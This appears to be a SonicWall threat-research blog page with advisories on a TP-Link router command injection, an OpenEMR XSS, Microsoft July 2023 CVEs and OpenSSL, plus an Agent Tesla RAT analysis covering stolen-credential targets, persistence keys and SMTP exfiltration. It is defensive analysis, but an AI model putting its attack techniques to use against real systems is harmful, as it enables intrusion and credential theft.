Posts

TP-Link Archer Command Injection Vulnerability

TP-Link is a company that specializes in manufacturing and selling networking products, including routers, switches, Wi-Fi range extenders, powerline adapters, access points, network adapters, and smart home devices. They provide reliable and affordable networking solutions for both home and business use.
The TP-Link Archer AX21 is a Wi-Fi 6 Dual-Band wireless router designed to deliver high-speed and reliable wireless connectivity for home networks.

TP-Link Archer AX21 Command Injection | CVE-2023-1389
TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 contain a command injection vulnerability in the web management interface.
The issue resides in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Due to inadequate sanitization of the country parameter in a write operation, an unauthenticated attacker could exploit the flaw using a simple POST request. By injecting malicious commands, the attacker could execute them as the root user, potentially gaining unauthorized access and control over the router.
The CVSS (Common Vulnerability Scoring System) score is 8.8 with CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

  • Attack vector is Adjacent.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is unchanged.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

As seen in the above exploit the vulnerable country parameter is used to download malicious content from the URL using the ‘wget’ command. The vertical bar | is used for piping the output of one command to another. In this case, the output of the previous ‘wget’ command is being piped to the ‘sh’ command, which stands for the shell. This means that the downloaded content is being passed directly to the shell for execution. The attacker could execute the command as a root user and take over the router .

SonicWall Capture Labs provides protection against this threat via the following signature:

  • IPS 15864:TP-Link Archer AX21 Command Injection

TP-Link has released firmware version 1.1.4 Build 20230219 which fixes this vulnerability.

Threat Graph

Microsoft Security Bulletin Coverage for July 2023

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of July 2023. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2023-32046 Windows MSHTML Platform Elevation of Privilege Vulnerability
IPS 19225: Windows MSHTML Platform Elevation of Privilege (CVE-2023-32046) 1
IPS 19226: Windows MSHTML Platform Elevation of Privilege (CVE-2023-32046) 2

CVE-2023-33134 Microsoft SharePoint Server Remote Code Execution Vulnerability
IPS 3941 : Microsoft SharePoint Server Remote Code Execution (CVE-2023-33134)

CVE-2023-33157 Microsoft SharePoint Remote Code Execution Vulnerability
IPS 3943 : Microsoft SharePoint Remote Code Execution (CVE-2023-33157)

CVE-2023-35311 Microsoft Outlook Security Feature Bypass Vulnerability
ASPY 461 : Exploit-exe exe.MP_330

CVE-2023-36874 Windows Error Reporting Service Elevation of Privilege Vulnerability
ASPY 462 : Exploit-exe exe.MP_331

CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability
ASPY 463 : Malformed-rtf rtf.MP_34

The following vulnerabilities do not have exploits in the wild :
CVE-2023-21526 Windows Netlogon Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21756 Windows Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-29347 Windows Admin Center Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-32033 Microsoft Failover Cluster Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32034 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32035 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32037 Windows Layer-2 Bridge Network Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32038 Microsoft ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32039 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32040 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32041 Windows Update Orchestrator Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32042 OLE Automation Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32043 Windows Remote Desktop Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-32044 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32045 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32047 Paint 3D Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32049 Windows SmartScreen Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-32050 Windows Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32051 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32052 Microsoft Power Apps Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-32053 Windows Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32054 Volume Shadow Copy Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32055 Active Template Library Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32056 Windows Server Update Service (WSUS) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32057 Microsoft Message Queuing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32083 Microsoft Failover Cluster Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32084 HTTP.sys Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32085 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-33127 .NET and Visual Studio Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33148 Microsoft Office Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33149 Microsoft Office Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33150 Microsoft Office Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-33151 Microsoft Outlook Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-33152 Microsoft ActiveX Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33153 Microsoft Outlook Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33154 Windows Partition Management Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33155 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33156 Microsoft Defender Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33158 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33159 Microsoft SharePoint Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-33160 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33161 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33162 Microsoft Excel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-33163 Windows Network Load Balancing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33164 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33165 Microsoft SharePoint Server Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-33166 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33167 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33168 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33169 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33170 ASP.NET and Visual Studio Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-33171 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-33172 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33173 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33174 Windows Cryptographic Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35296 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35297 Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35298 HTTP.sys Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35299 Windows Common Log File System Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35300 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35302 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35303 USB Audio Class System Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35304 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35305 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35306 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35308 Windows MSHTML Platform Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-35309 Microsoft Message Queuing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35310 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35312 Microsoft VOLSNAP.SYS Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35313 Windows Online Certificate Status Protocol (OCSP) SnapIn Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35314 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35315 Windows Layer-2 Bridge Network Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35316 Remote Procedure Call Runtime Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35317 Windows Server Update Service (WSUS) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35318 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35319 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35320 Connected User Experiences and Telemetry Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35321 Windows Deployment Services Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35322 Windows Deployment Services Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35323 Windows OLE Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35324 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35325 Windows Print Spooler Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35326 Windows CDP User Components Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35328 Windows Transaction Manager Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35329 Windows Authentication Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35330 Windows Extended Negotiation Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35331 Windows Local Security Authority (LSA) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35332 Windows Remote Desktop Protocol Security Feature Bypass
There are no known exploits in the wild.
CVE-2023-35333 MediaWiki PandocUpload Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35335 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-35336 Windows MSHTML Platform Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-35337 Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35338 Windows Peer Name Resolution Protocol Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35339 Windows CryptoAPI Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35340 Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35341 Microsoft DirectMusic Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35342 Windows Image Acquisition Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35343 Windows Geolocation Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35344 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35345 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35346 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35347 Microsoft Store Install Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35348 Active Directory Federation Service Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-35350 Windows Active Directory Certificate Services (AD CS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35351 Windows Active Directory Certificate Services (AD CS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35352 Windows Remote Desktop Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-35353 Connected User Experiences and Telemetry Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35356 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35357 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35358 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35360 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35361 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35362 Windows Clip Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35363 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35364 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35365 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35366 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35367 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35373 Mono Authenticode Validation Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-35374 Paint 3D Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36867 Visual Studio Code GitHub Pull Requests and Issues Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36868 Azure Service Fabric on Windows Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-36871 Azure Active Directory Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-36872 VP9 Video Extensions Information Disclosure Vulnerability
There are no known exploits in the wild.

OpenEMR Reflected XSS Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  OpenEMR is a comprehensive open-source electronic health records (EHR) and medical practice management application. It provides an array of functionalities aimed at enhancing the efficiency of medical practice management. Among the critical features it provides are patient statistics, medical billing, electronic medical record (EMR) generation, and appointment scheduling. The listed capabilities empower medical practitioners, clinics, and hospitals to effectively manage and coordinate patient schedules, maintain detailed patient records, and streamline the billing process electronically. OpenEMR is designed with a flexible, user-friendly interface, making it an accessible solution for healthcare providers aiming to digitize and optimize their administrative and patient care processes. As an open-source platform, it also affords the flexibility of customization according to individual or institutional needs, further enhancing its applicability across a broad range of healthcare settings.

  A reflected cross-site scripting vulnerability has been identified in OpenEMR. This vulnerability arises from inadequate input validation associated with the ‘list_id’ parameter in ‘share_template.php’.

  A remote attacker could exploit this vulnerability by enticing a victim to open a crafted URL. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim’s browser.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-2948.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.6 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C).

  Base score is 9.6 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is required.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.6 (E:P/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is proof of concept.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  The vulnerability stems from inadequate validation of the “list_id” parameter in the “share_template.php” file. When a request is submitted to the RequestURI at “library/custom_template/share_template.php”, it leads to the generation of HTML content by “share_template.php”. This content also encompasses some JavaScript code. Within the context of this generated JavaScript code, the value of the “list_id” parameter is manifested in the definition of a function called “add_template()”, as illustrated below:
  
  where $list_id is sanitized first by using PHP htmlspecialchars() function.

  However, the use of htmlspecialchars() for XSS sanitization in this case is ineffective, as it only escapes the characters “<", ">“, and single and double quotes. An attacker can bypass this limitation by sending malicious JavaScript code that excludes these specific characters in the “list_id” request parameter and delivering the request to the “share_template.php” endpoint. With a specially tailored “list_id” value, the attacker can interfere with the original “add_template()” function definition and append their own JavaScript code immediately after it. For instance, consider a situation where the “list_id” parameter contains a skillfully crafted value like the one below:
  
  Then “share_template.php” will generate the JavaScript code HTML format as below:
  
  In this scenario, the crafted value allows the original “add_template()” function definition to be escaped and a script command – “alert(55555)” – to be inserted right after the function’s conclusion. Consequently, the “alert(55555)” will execute when the server-returned HTML content is loaded in the user’s browser. If the “alert(55555)” were to be swapped with a different malicious script, it would lead to the execution of this harmful code in the browser, potentially triggering XSS opportunities.

Triggering the Problem:

  • The target system must have the vulnerable product installed and running.
  • The target user must have network connectivity to the affected ports.
  • The attacker must be able to deliver a malicious URL to a target user.

Triggering Conditions:

  A user is lured by an attacker into opening a URL that contains a carefully designed list_id parameter. The vulnerability manifests itself when the user initiates the URL in a web browser.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS
  

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 19216 OpenEMR Cross-Site Scripting

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Filtering traffic based on the signature above.
    • Upgrading the product to a non-vulnerable version.
  The vendor has released the following patch to address this issue:
  Vendor Advisory

Agent Tesla RAT Disguised As NSIS Installer

Overview

The SonicWall Capture Labs Research team recently observed an Agent Tesla malware that is being loaded using Native Loader. Agent Tesla is an advanced Remote Access Trojan (RAT) developed using Microsoft .Net framework capable of stealing sensitive information. It has been one of the most prevalent malware families from the past couple of years.

In this blog post, we will discuss.

  • Capabilities of Agent Tesla with complete catalog of targeted software.
  • Understanding how Native Loader is used to load Agent Tesla.
  • Evolution of Agent Tesla’s String Decryption Algorithm.
  • Approach for Automatic String Decryption.

Introduction

Agent Tesla malware first appeared in 2014 has been active for over last nine years and it is constantly being updated by its threat actor by adding new capabilities. Agent tesla’s main objective consists of credential stealing, keylogging, screen capture, clipboard capture, stealing victims’ application data and send it to threat actor.

Infection Cycle

Agent Tesla is mainly delivered though phishing emails.

Fig 1. Infection Cycle

Unpacking of AgentTesla

Recent variant of Agent Tesla is being distributed as NSIS Installer consisting of NSIS script, DLL plugin and encrypted payload’s file.

Fig 2. Extracted Files of NSIS installer

Layer 1 – Plugin DLL

NSIS-plugin DLL calls its the exported function “HvDeclY” which decrypts the layer 2 shellcode.

Layer 2 – Shellcode

API HASHING

Shellcode uses API Hashing to obfuscate API calls.

Fig 3. Custom API Hashing Algorithm

ANTI-EMULATION

Shellcode crash itself by jumping to invalid address when dwNumberOfProcessors < 1 or VirtualAllocExNuma API not able to allocates memory.

Shellcode has an Anti-Emulation check – It allocates the 381 MB of memory space, set each byte to 0 and free that memory space.

On 64-bit system, Shellcode uses heaven’s gate technique to avoid analysis by debugger.

Fig 4. Heaven’s Gate call

PROCESS HOLLOWING

On 64-bit system Shellcode executes some API’s using Syscall instruction that are used for Process Hollowing. On 32-bit same APIs are using Sysenter instruction.

Fig 5. 64-bit Code, Syscall through Heaven’s Gate

This layer serves as loader to begin the execution of native loader.

Native Loader

Layer 2 shellcode decrypts an encrypted native C++ loader and start its execution. This Agent Tesla variant has a noteworthy difference from previously examined variants, in this variant Agent Tesla is loaded via a native C++ loader instead of multiple stages of .net assembly modules.

Native loader stores the final payload Agent Tesla in its resource’s directory. The Common Language Runtime is integrated by the loader via CLR Hosting Interfaces in order to load and run .Net assemblies. Mscoree DLL implements functions that is used for CLR hosting.

Fig 6. API’s call sequence to load .Net managed assembly from unmanaged code.

This native loader injects the final Agent Tesla payload in newly created process and start its execution.

Technical Analysis of Agent Tesla

Capabilities of Agent Tesla

This recent version of Agent Tesla harvest variety of sensitive data from a wide selection of browsers, VPN, FTP , Email clients and more. Sensitive data of the application includes its credentials, “\user data” directory of particular browser, Cookies from browser and FTP application, Configuration data.

  • Data Harvesting 
    • Browsers: IE/Edge, UC Browser, Safari for Windows, QQ Browser, Falkon Browser, Flock Browser, Opera Browser, Yandex Browser, Iridium Browser, Chromium, 7 Star, Torch Browser, Cool Novo, Chrome Plus, Kometa, Amigo, Brave, Cent Browser, Chedot, Orbitum, Sputnik, Comodo Dragon, Vivaldi, Citrio, 360 Browser, Uran, Liebao Browser, Elements Browser, Epic Privacy, Cốc Cốc browser, Sleipnir 6, QIP Surf, Coowon, Google Chrome, Edge Chromium, Firefox, SeaMonkey, BlackHawk , CyberFox, K-Meleon, IceCat, Pale Moon, IceDragon, WaterFox, Postbox
    • Email clients: Eudora, The Bat, Becky, Outlook, Windows Mail App, FoxMail, Opera Mail, PocoMail, eM Client, Mailbird, Thunderbird,  Claws,  IncrediMail.
    • FTP/SCP clients: FileZilla, CoreFTP, WinSCP, Flash FXP, FTP Navigator, SmartFTP, WS_FTP, FtpCommander, FTPGetter.
    • Databases: Berkelet DB, MySQL Workbench.
    • VPN clients: NordVPN, OpenVPN, Private Internet Access VPN.
    • Virtual network computing clients: RealVNC, WinVNC3, TightVNC, UltraVNC.
    • Instant Messaging programs: Discord, Paltalk, Pidgin, Psi/Psi+, Trillian
    • Dynamic DNS clients: DynDns
    • Download Managers: JDownloader, Internet Downloader Manager
    • Windows Credentials: Windows Secure Note, Windows Web Password Credential, Windows Credential Picker Protector, Web Credentials, Windows Credentials, Windows Domain Certificate Credential, Windows Domain Password Credential, Windows Extended Credential
  • Keystrokes logging
  • Clipboard Scraping
  • Screenshot Capturing
  • Deleting Zone identifier
    • Agent Tesla deletes Zone Identifer to remove its trace that origin of file is untrusted source.

      Fig 7. Deleting Zone identifier

Fingerprinting

Agent Tesla uses Computer name, Operating System , Processor name, Total memory, Current date and time , IP Address, Internet connectivity and Username, MacAddress, Serial Number for fingerprinting.

Persistence

Agent Tesla achieves persistence by adding two autorun registry keys.

  • Software\Microsoft\Windows\CurrentVersion\Run
  • SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run

Exfiltration

Normally Agent Tesla exfiltrate collected data via FTP, HTTP, SMTP and Telegram bot, but in this variant it only uses SMTP to exfiltrate data.

Malware uses compromised email account to exfiltrate collected data to mail server which is being managed by the attacker.

The above discussed techniques are similar in most of the .Net stealers. The SonicWall research team has provided a full explanation for above techniques in Unmasking .Net Stealer and Redline blog posts.

Configuration Data

Agent Tesla keeps its configuration data encoded.

Fig 8. Agent Tesla’s Decoded Configuration Data

Evolution of String decryption Algorithm

In this section we will discuss the evolution of string decryption algorithms of Agent Tesla.

Agent Tesla is actively changing its tactics to hide from security software’s. One of the tactics is string encryption, it is crucial to keep them hidden from security software and reverser’s. All the important configuration data and ioc’s such as browser names  list, c2 host name, smtp credentials in Agent Tesla are stored as encrypted strings.

Version 1

In this version encrypted strings are stored as base64 encoded.

The SHA1 hashing algorithm is used by decryption function “s_method_0” to generate a key using a hardcoded password and salt. The base64 decoded string is then decrypted with the AES algorithm using CBC mode using the generated key and hardcoded IV.

Fig 9. AES Decryption Function(bottom), example of encrypted string(top)

Version 2

In this version Agent Tesla uses AES algorithm in CBC mode same as in version 1 but it uses different Key and IV for each decryption the string. Strings are stored in an array of object, where each object has three elements that are an encrypted string, Key and IV.

 

Fig 10. AES Decryption Function(bottom), example of encrypted string(top)

Version 3

In this version Agent Tesla implements simple Xor decryption. Xored strings are stored in array of bytes.

Decryption function is defined in .cctor() constructor of binary file. When malware starts its execution, its constructor gets called automatically and it decrypts an encrypted string array using hardcoded Xor byte-size key. To locate an exact string malware uses array offset and size of string as there is no separator between strings.

Fig 11. Simple Xor decryption(bottom), example of encrypted string(top)

Version 4

In this version Agent Tesla author has copied and abused an open-source .NET string encryption tool XorStringsNET .

In this version strings are stored as encrypted data blob. Data blob has below format.

As per .NET file format data blob is stored as field of structure as shown below.

Fig 12. Data blob stored as structure with size of =19953 bytes

Approach for string decryption

1) We can use de4dot tool to automatically decrypt the strings and get binary file with strings are decrypted. It comes with multiple options to manipulate the .Net binary file.

Consider below command as example to decrypt the strings.

de4dot.exe -f file -o outfile –strtyp delegate –strtok 0x6000001

strtok – Enter the method token of the Decryption method. We can get it easily using DnSpy.

Fig 13. de4dot cmdline options

strtyp – This option can be one of the below methods.

Fig 14. String decrypter type available

2) Python Scripts by parsing .Net metadata.

Writing python script to decrypt strings automatically, we need to find required data as below.

  • .Net metadata – Parse required metadata such as Method/Structure Token, RVA, File offset required for string decryption.

Many open source .Net parsing libraries are available on Github.

Conclusion

Agent Tesla RAT has been active from several years and it is continuing to evolve. It has developed new ways such as use of native C++ loader for evading detection. Agent Tesla is successfully able to harvest and exfiltrate data to the attacker. In each version Agent Tesla continues to improve its string encryption functions and addition into its data stealing capability catalog . We expect major improvements in the next version of it.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: AgentTesla.A (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

IOC’s

D63FE952E90788072C6166A39BDE21B5 – NSIS Installer

B67E8512632AAE047A483B643EA6B1B4 – NSIS Plugin DLL

F8F2ED5A4E1FB2F14D49349CE4E2B779 – Encrypted Stage 2

57B264BF971F2BCF62140130CFD94CF5 – C++ Loader

A0A5B08B0EFFF9FAA96455B699893F76 – Agent Tesla

OpenSSL OBJ_obj2txt Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  OpenSSL stands as a renowned open-source library, primarily utilized for SSL and TLS. The Secure Socket Layer (SSL) and the Transport Layer Security (TLS), referenced interchangeably from this point onward, are cryptographic protocols designed to ensure communication security, data integrity, and authentication over TCP/IP networks. By harnessing the power of cryptography primitives—symmetric key ciphers, cryptographically robust hash functions, and the Public Key Infrastructure (PKI)—these protocols facilitate secure communication between hosts over unsecured networks.

  PKI, a prevalent authentication system for TLS, is dependent on certificates for conveying necessary cryptographic data, such as RSA keys, signatures, and identity information, all vital for encryption and authentication. The ITU standard, X.509, details the structure of these public-key certificates.

  There are three existing versions of X.509: X.509 v1 and v3 are older and newer standards, respectively, utilized for certificate representation. Conversely, X.509 v2 outlines the standard for representing Certificate Revocation Lists (CRLs). These certificate representations are outlined using Abstract Syntax Notation One (ASN.1) and encoded via the Distinguished Encoding Rules (DER).

  Recently, a denial-of-service vulnerability has been discovered in the OpenSSL library. This vulnerability emanates from delays encountered during the processing of ASN.1 OBJECT IDENTIFIERs.

  A remote attacker can exploit this vulnerability by transmitting specially crafted packets to an OpenSSL client, or a server that has purposefully activated client authentication. Should this exploitation prove successful, it could instigate denial-of-service conditions on the impacted service.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-2650.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 4.6 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:U/RL:O/RC:C).

  Base score is 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is none.
    • Impact of this vulnerability on data integrity is none.
    • Impact of this vulnerability on data availability is low.
  Temporal score is 4.6 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  It’s important to shed light on the OBJECT IDENTIFIER tag and its workings. The OBJECT IDENTIFIER data type, encoded into a TLV (Type, Length, Value) triplet, commences with a Tag value of 0x06. The encoding of each integer in a dotted decimal object identifier (OID) is governed by a set of specific rules. First and foremost, the OID’s initial two nodes are encoded onto a solitary byte, with the first node being multiplied by the decimal 40 and the result is added to the second node’s value. Secondly, node values that are either equal to or less than 127 are encoded on a single byte. Lastly, node values that are equal to or exceed 128 are encoded on multiple bytes, with Bit 7 of the leftmost byte set to one and Bits 0 through 6 of each byte containing the encoded value.

  For illustration, consider the OBJECT IDENTIFIER “1.3.6.1.4.1.311.21.20”. It would be encoded as follows: “06 09 2b 06 01 04 01 82 37 15 14”. Here, “06” stands for the OBJECT IDENTIFIER tag, “09” represents the length of the OBJECT IDENTIFIER, and the subsequent bytes are the encoded values, utilizing the previously mentioned three rules.

